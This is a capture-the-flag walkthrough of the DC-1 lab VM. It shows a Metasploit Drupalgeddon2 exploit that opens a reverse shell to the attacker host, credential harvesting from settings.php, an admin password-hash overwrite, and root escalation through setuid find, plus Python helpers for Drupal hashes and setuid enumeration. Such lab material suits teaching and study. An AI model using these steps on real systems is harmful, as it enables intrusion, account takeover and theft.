
DCchallenges1

Installation

After downloading and extracting the archive, open the .ova file in VMware and set its network adapter to bridged mode; set the Kali VM to bridged mode as well so that both machines sit on the same subnet.


Environment

Subnet: 192.168.18.0/24

Kali: 192.168.18.131

Target: 192.168.18.130


Scan the subnet (host discovery)

sudo nmap -sn 192.168.18.0/24

Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-27 21:30 CST
Nmap scan report for 192.168.18.2
Host is up (0.00015s latency).
MAC Address: 00:50:56:E0:DA:9A (VMware)
Nmap scan report for 192.168.18.130
Host is up (0.00018s latency).
MAC Address: 00:0C:29:F4:40:B8 (VMware)
Nmap scan report for 192.168.18.254
Host is up (0.00036s latency).
MAC Address: 00:50:56:F1:CD:81 (VMware)
Nmap scan report for 192.168.18.131
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.16 seconds


Scan the target's open ports

sudo nmap -sS 192.168.18.130

Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-27 21:31 CST
Nmap scan report for 192.168.18.130
Host is up (0.000079s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
111/tcp open  rpcbind
MAC Address: 00:0C:29:F4:40:B8 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.24 seconds

Note: -sS is a SYN ("half-open") scan. It sends a SYN, reads the SYN/ACK or RST, and never completes the three-way handshake, so the listening service never sees a connection and writes nothing to its own application log. That is the only sense in which it is quiet: the SYN packets are fully visible to a host firewall, an IDS or flow monitoring, so do not treat it as invisible. It needs raw sockets, hence root. Two further points for real engagements: without -p this scan only covers nmap's default top 1000 TCP ports, so add -p- before concluding nothing else is listening; and scan conservatively rather than firing every option at once.

Port 80 is open, so browse to http://192.168.18.130/. The page content identifies the site as running the Drupal CMS.

Run dirsearch to see what is exposed

python3 dirsearch.py -u 192.168.18.130:80

Try dirb as well

dirb http://192.168.18.130

Neither turned up anything useful, so look at robots.txt:

User-agent: *
Crawl-delay: 10
# Directories
Disallow: /includes/
Disallow: /misc/
Disallow: /modules/
Disallow: /profiles/
Disallow: /scripts/
Disallow: /themes/
# Files
Disallow: /CHANGELOG.txt
Disallow: /cron.php
Disallow: /INSTALL.mysql.txt
Disallow: /INSTALL.pgsql.txt
Disallow: /INSTALL.sqlite.txt
Disallow: /install.php
Disallow: /INSTALL.txt
Disallow: /LICENSE.txt
Disallow: /MAINTAINERS.txt
Disallow: /update.php
Disallow: /UPGRADE.txt
Disallow: /xmlrpc.php
# Paths (clean URLs)
Disallow: /admin/
Disallow: /comment/reply/
Disallow: /filter/tips/
Disallow: /node/add/
Disallow: /search/
Disallow: /user/register/
Disallow: /user/password/
Disallow: /user/login/
Disallow: /user/logout/
# Paths (no clean URLs)
Disallow: /?q=admin/
Disallow: /?q=comment/reply/
Disallow: /?q=filter/tips/
Disallow: /?q=node/add/
Disallow: /?q=search/
Disallow: /?q=user/password/
Disallow: /?q=user/register/
Disallow: /?q=user/login/
Disallow: /?q=user/logout/

Nothing directly useful here: these entries are Drupal's stock robots.txt. It does confirm the Drupal fingerprint, and /CHANGELOG.txt, if it is readable, gives the exact version.


Drupal 7 has a well-known unauthenticated remote code execution bug, Drupalgeddon2 (CVE-2018-7600, SA-CORE-2018-002), and Metasploit ships a module for it:

msfconsole

msf6 > search drupal
msf6 > use exploit/unix/webapp/drupal_drupalgeddon2


msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show options
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.18.130
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show options
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit
[*] Started reverse TCP handler on 192.168.18.131:4444
[*] Executing automatic check (disable AutoCheck to override)
[!] The service is running, but could not be validated.
[*] Sending stage (39282 bytes) to 192.168.18.130
[*] Meterpreter session 1 opened (192.168.18.131:4444 -> 192.168.18.130:43581) at 2021-04-28 20:26:27 +0800
meterpreter > getuid
Server username: www-data (33)
meterpreter > pwd
/var/www
meterpreter > ls
Listing: /var/www
meterpreter > shell
Process 4653 created.
Channel 3 created.

flag1

cd /var/www
cat flag1.txt
Every good CMS needs a config file - and so do you.

flag4

cat /etc/passwd
There is a flag4 user near the bottom: flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash
cd /home/flag4
ls
flag4.txt
cat flag4.txt
Can you use this same method to find or access the flag in root?

Probably. But perhaps it's not that easy. Or maybe it is?


flag2

Check the site configuration for anything useful (the hint in flag1 points at the CMS config file)
cd /var/www/sites/default
ls
default.settings.php
files
settings.php

cat settings.php
<?php

/**
*
* flag2
* Brute force and dictionary attacks aren't the
* only ways to gain access (and you WILL need access).
* What can you do with these credentials?
*
*/

$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupaldb',
'username' => 'dbuser',
'password' => 'R0ck3t',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
);

... ...



Upgrade to an interactive TTY with python: python -c "import pty;pty.spawn('/bin/bash')" (this makes the mysql client and other interactive commands usable from the Meterpreter shell)



flag3

The database credentials fell out along the way, so log in to the database and have a look

www-data@DC-1:/var/www/sites/default$ mysql -u dbuser -p
Enter password: R0ck3t

Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 418639
Server version: 5.5.60-0+deb7u1 (Debian)

Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| drupaldb           |
+--------------------+
2 rows in set (0.00 sec)

mysql> use drupaldb
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables from drupaldb;
... ...
mysql> select * from users;
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
| uid | name  | pass                                                    | mail              | theme | signature | signature_format | created    | access     | login      | status | timezone            | language | picture | init              | data |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
|   0 |       |                                                         |                   |       |           | NULL             |          0 |          0 |          0 |      0 | NULL                |          |       0 |                   | NULL |
|   1 | admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR | admin@example.com |       |           | NULL             | 1550581826 | 1550583852 | 1550582362 |      1 | Australia/Melbourne |          |       0 | admin@example.com | b:0; |
|   2 | Fred  | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg | fred@example.org  |       |           | filtered_html    | 1550581952 | 1550582225 | 1550582225 |      1 | Australia/Melbourne |          |       0 | fred@example.org  | b:0; |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+




The Drupal 7 hashes above (the $S$ prefix) are salted SHA-512 run 2^15 times (the 'D' after $S$ encodes the iteration count), so cracking them offline (hashcat mode 7900) is slow and only pays off if the password is weak. With write access to the database it is faster to reset the admin password instead: generate a new hash with the script in the web root, scripts/password-hash.sh, then write it into the users table. Record the original hash first so it can be restored when you are done.
php scripts/password-hash.sh admin (admin is the new password you want to set)

www-data@DC-1:/var/www$ php scripts/password-hash.sh admin
php scripts/password-hash.sh admin

password: admin hash: $S$DiOAa4l0lQWNrQKTEfwN1erRW769BkBafRIkfVBFRS79BIWF.Vtb



Write the new hash into the database
mysql> update users set pass ="$S$DiOAa4l0lQWNrQKTEfwN1erRW769BkBafRIkfVBFRS79BIWF.Vtb" where name="admin";
Query OK, 1 row affected (0.00 sec)
Rows matched: 1 Changed: 1 Warnings: 0

After the reset, log in to the site as admin / admin.
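As an added example (not part of the original write-up, and not Drupal's own code), the Drupal 7 hash scheme is re-implemented below in Python by following includes/password.inc. It lets you confirm that the hash produced by password-hash.sh above really corresponds to "admin", and it lets you generate a replacement $S$ hash off-box when you cannot run PHP on the target. The 55-character hash string quoted in the usage note is the one the page obtained from password-hash.sh; the function names and everything else here are this example's own.

```python
"""Drupal 7 password hashing ($S$...), re-implemented in Python.

Added example, not code from the original write-up and not Drupal's own
code: it mirrors _password_crypt(), _password_base64_encode() and
user_check_password() from Drupal 7's includes/password.inc so hashes from
scripts/password-hash.sh (or the users table) can be checked and generated
without PHP on the box.
"""
import hashlib
import hmac
import math
import os

# phpass alphabet; the character after "$S$" indexes into it to give log2(rounds).
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
DRUPAL_HASH_LENGTH = 55      # stored hashes are cut to this length
DRUPAL_HASH_COUNT = 15       # default: 2**15 rounds of sha512 ('D' in ITOA64)
DRUPAL_MIN_HASH_COUNT = 7
DRUPAL_MAX_HASH_COUNT = 30


def _b64_encode(data: bytes) -> str:
    """phpass-style base64: 6 bits per output char, no padding, ITOA64 alphabet."""
    out = []
    i, n = 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def _password_crypt(algo: str, password: str, setting: str):
    """Hash `password` under the 12-char setting "$S$" + count char + 8-char salt.

    Returns the 55-char Drupal hash, or None for a malformed setting.
    """
    if len(password) > 512:          # Drupal refuses huge passwords (DoS guard)
        return None
    setting = setting[:12]
    if len(setting) != 12 or setting[0] != "$" or setting[2] != "$":
        return None
    count_log2 = ITOA64.find(setting[3])
    if not DRUPAL_MIN_HASH_COUNT <= count_log2 <= DRUPAL_MAX_HASH_COUNT:
        return None
    salt = setting[4:12]
    pw = password.encode("utf-8")
    digest = hashlib.new(algo, salt.encode("utf-8") + pw).digest()
    for _ in range(1 << count_log2):                 # PHP: do { ... } while (--count)
        digest = hashlib.new(algo, digest + pw).digest()
    output = setting + _b64_encode(digest)
    if len(output) != 12 + math.ceil(8 * len(digest) / 6):
        return None
    return output[:DRUPAL_HASH_LENGTH]


def hash_password(password: str, count_log2: int = DRUPAL_HASH_COUNT,
                  salt_bytes: bytes = None) -> str:
    """Equivalent of user_hash_password(): 6 random salt bytes (8 chars encoded), sha512."""
    if salt_bytes is None:
        salt_bytes = os.urandom(6)
    setting = "$S$" + ITOA64[count_log2] + _b64_encode(salt_bytes)[:8]
    result = _password_crypt("sha512", password, setting)
    if result is None:
        raise ValueError("count_log2 out of range or bad salt")
    return result


def check_password(password: str, stored_hash: str) -> bool:
    """Equivalent of user_check_password(): $S$ (sha512), $P$/$H$ (phpass md5),
    and the "U$" prefix Drupal puts on hashes migrated from Drupal 6 (extra md5)."""
    if stored_hash.startswith("U$"):
        stored_hash = stored_hash[1:]
        password = hashlib.md5(password.encode("utf-8")).hexdigest()
    algo = {"$S$": "sha512", "$P$": "md5", "$H$": "md5"}.get(stored_hash[:3])
    if algo is None:
        return False
    computed = _password_crypt(algo, password, stored_hash)
    return computed is not None and hmac.compare_digest(computed, stored_hash)


if __name__ == "__main__":
    print(hash_password("admin"))    # fresh $S$D... hash, usable in the UPDATE above
```

check_password("admin", "$S$DiOAa4l0lQWNrQKTEfwN1erRW769BkBafRIkfVBFRS79BIWF.Vtb") returns True, and hash_password("admin") gives a fresh 55-character $S$D... hash with a random salt that can be dropped straight into the UPDATE users ... statement shown above. The 32768 SHA-512 rounds per guess are what makes offline cracking of these hashes slow.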




But the shell itself is still unprivileged:

whoami 
www-data

flag5

Privilege escalation via setuid find. On this box the find binary carries the setuid-root bit, so every command it runs through -exec inherits root. The standard check for this class of weakness is find / -perm -4000 -type f 2>/dev/null (or -perm -u=s), which lists every setuid file the current user can stat. The same trick with -exec /bin/sh \; gives an interactive root shell rather than one command at a time (dash keeps the inherited effective UID; bash would drop it back to www-data unless started with -p).

www-data@DC-1:/var/www$ touch dctest
www-data@DC-1:/var/www$ find dctest -exec whoami \;
root
www-data@DC-1:/var/www$ whoami
www-data
www-data@DC-1:/var/www$ find dctest -exec ls /root \;
thefinalflag.txt
www-data@DC-1:/var/www$ find dctest -exec cat /root/thefinalflag.txt \;
Well done!!!!

Hopefully you've enjoyed this and learned some new skills.

You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7
www-data@DC-1:/var/www$

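The find trick above works only because find is setuid root on DC-1, and the first thing a practitioner does after landing as www-data is enumerate every such binary. The following is an added example, not code from the original write-up: it does in Python what find / -perm -4000 -type f 2>/dev/null does in the shell, then cross-checks the results against a short list of programs that can run arbitrary commands from inside themselves. The SHELL_CAPABLE list and the temporary demo tree are this example's own assumptions.

```python
"""Enumerate setuid/setgid executables and flag the ones that can hand out a shell.

Added example, not code from the original write-up. It does in Python what
`find / -perm -4000 -type f 2>/dev/null` does in the shell, then cross-checks
the results against a short, hand-picked list of programs that will run
arbitrary commands from inside themselves (the class DC-1's setuid find
belongs to). SHELL_CAPABLE is an assumption of this example, not a catalogue.
"""
import os
import shutil
import stat
import tempfile

# Programs that can spawn a shell or execute a command from inside themselves;
# setuid root on any of them is a direct privilege escalation. Illustrative
# subset (assumed); extend it from a reference such as GTFOBins.
SHELL_CAPABLE = {
    "find", "vim", "vi", "nmap", "bash", "sh", "dash", "python", "python3",
    "perl", "awk", "gawk", "less", "more", "env", "cp", "mv", "tee",
}

# Pseudo-filesystems: noisy, and they never hold real setuid binaries.
SKIP_DIRS = ("/proc", "/sys", "/dev", "/run")


def _under(dirpath, prefixes):
    return any(dirpath == p or dirpath.startswith(p + "/") for p in prefixes)


def find_setuid(root="/"):
    """Yield (path, mode, uid) for each regular file with the setuid or setgid bit.

    os.walk silently skips directories we cannot read (normal for www-data),
    lstat keeps symlinks from being followed, and pseudo-filesystems are pruned.
    """
    for dirpath, dirnames, filenames in os.walk(root):
        if _under(dirpath, SKIP_DIRS):
            dirnames[:] = []            # prune: do not descend further
            continue
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                yield path, st.st_mode, st.st_uid


def classify(entries, privileged_uids=(0,)):
    """Return [(path, reason)] for setuid files owned by a privileged uid whose
    basename is in SHELL_CAPABLE. Setgid-only files are deliberately left out:
    they grant a group, not a root shell."""
    hits = []
    for path, mode, uid in entries:
        name = os.path.basename(path)
        if mode & stat.S_ISUID and uid in privileged_uids and name in SHELL_CAPABLE:
            hits.append((path, "%s is setuid (owner uid %d) and can run arbitrary commands" % (name, uid)))
    return hits


def demo():
    """Constructed tree (not a real system): a setuid 'find' (in the list), a
    setuid 'ls' (not in the list) and a plain 'bash'. The files belong to us,
    so the privileged uid is our own rather than 0."""
    base = tempfile.mkdtemp(prefix="suid-demo-")
    try:
        bindir = os.path.join(base, "usr", "bin")
        os.makedirs(bindir)
        for name, mode in (("find", 0o4755), ("ls", 0o4755), ("bash", 0o755)):
            path = os.path.join(bindir, name)
            with open(path, "wb") as fh:
                fh.write(b"#!/bin/sh\n")     # placeholder body; only the mode bits matter
            os.chmod(path, mode)
        entries = sorted(find_setuid(base))
        hits = classify(entries, privileged_uids=(os.getuid(),))
        return {
            "setuid": [os.path.basename(p) for p, _, _ in entries],
            "hits": [os.path.basename(p) for p, _ in hits],
        }
    finally:
        shutil.rmtree(base, ignore_errors=True)


if __name__ == "__main__":
    for path, reason in classify(find_setuid("/")):
        print(path, "-", reason)
```

Run as-is it walks the real filesystem from / and prints root-owned setuid binaries that are in the list; on DC-1 that includes /usr/bin/find. demo() shows the same logic on a throwaway directory: both find and ls come back as setuid, but only find is reported as a shell-capable hit.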